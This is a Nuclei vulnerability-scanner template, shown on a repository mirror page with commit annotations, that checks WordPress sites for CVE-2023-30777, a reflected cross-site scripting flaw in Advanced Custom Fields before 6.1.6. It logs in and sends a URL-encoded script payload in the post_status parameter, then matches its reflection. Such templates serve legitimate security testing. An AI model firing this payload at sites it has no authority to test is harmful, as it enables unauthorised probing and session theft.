daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity
nuclei-templates/http/cves/2023/CVE-2023-30777.yaml

54 lines
2.8 KiB
YAML
Raw Normal View History

templates added
2023-07-07 09:38:49 +00:00
id: CVE-2023-30777
info:
name: Advanced Custom Fields < 6.1.6 - Cross-Site Scripting
author: r3Y3r53
severity: medium
description: |
Advanced Custom Fields beofre 6.1.6 is susceptible to cross-site scripting via the post_status parameter due to insufficient input sanitization and output escaping. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
Added Impact
2023-09-27 15:51:13 +00:00
impact: |
Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of a victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.
updated remediation in 2023 CVEs
2023-09-06 11:43:37 +00:00
remediation: Fixed in version 6.1.6.
templates added
2023-07-07 09:38:49 +00:00
reference:
- https://wpscan.com/vulnerability/95ded80f-a47b-411e-bd17-050439bf565f
- https://wordpress.org/plugins/advanced-custom-fields/advanced/
- https://nvd.nist.gov/vuln/detail/CVE-2023-30777
CVE Enrichment :tada:
2023-07-11 19:49:27 +00:00
- https://patchstack.com/database/vulnerability/advanced-custom-fields-pro/wordpress-advanced-custom-fields-pro-plugin-6-1-5-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve
- https://patchstack.com/database/vulnerability/advanced-custom-fields/wordpress-advanced-custom-fields-plugin-6-1-5-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve
templates added
2023-07-07 09:38:49 +00:00
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2023-30777
cwe-id: CWE-79
product/queries updated
2024-05-31 19:23:20 +00:00
epss-score: 0.00527
epss-percentile: 0.76946
updated remediation in 2023 CVEs
2023-09-06 11:43:37 +00:00
cpe: cpe:2.3:a:advancedcustomfields:advanced_custom_fields:*:*:*:*:-:wordpress:*:*
templates added
2023-07-07 09:38:49 +00:00
metadata:
verified: true
updated remediation in 2023 CVEs
2023-09-06 11:43:37 +00:00
max-request: 2
CVE Enrichment :tada:
2023-07-11 19:49:27 +00:00
vendor: advancedcustomfields
product: advanced_custom_fields
updated remediation in 2023 CVEs
2023-09-06 11:43:37 +00:00
framework: wordpress
auto tagging via templateman
2024-01-14 09:21:50 +00:00
tags: cve2023,cve,wpscan,advance-custom-field,wp,wp-plugin,wordpress,authenticated,xss,advancedcustomfields
templates added
2023-07-07 09:38:49 +00:00
http:
- raw:
- |
POST /wp-login.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
log={{username}}&pwd={{password}}&wp-submit=Log+In
- |
GET /wp-admin/edit.php?post_type=acf-post-type&post_status=%22style%3Danimation-name%3Arotation+onanimationstart%3Dalert%28document.domain%29%2F%2F HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'status_code_2 == 200'
- 'contains(content_type_2, "text/html")'
- 'contains(body_2, "onanimationstart=alert(document.domain)//")'
- 'contains(body_2, "Advanced Custom Fields")'
condition: and
Auto Template Signing [Mon Mar 25 11:57:16 UTC 2024] :robot:
2024-03-25 11:57:16 +00:00
# digest: 490a00463044022056850f415fae2d0929dad93fe10665c4ffa3942c147dfc81c7ebf791f92ac5b50220214d9094cddb98c12f33f8027ead5c1b1977b3ac248e35474df4173260e464fa:922c64590222798bb761d5b6d8e72950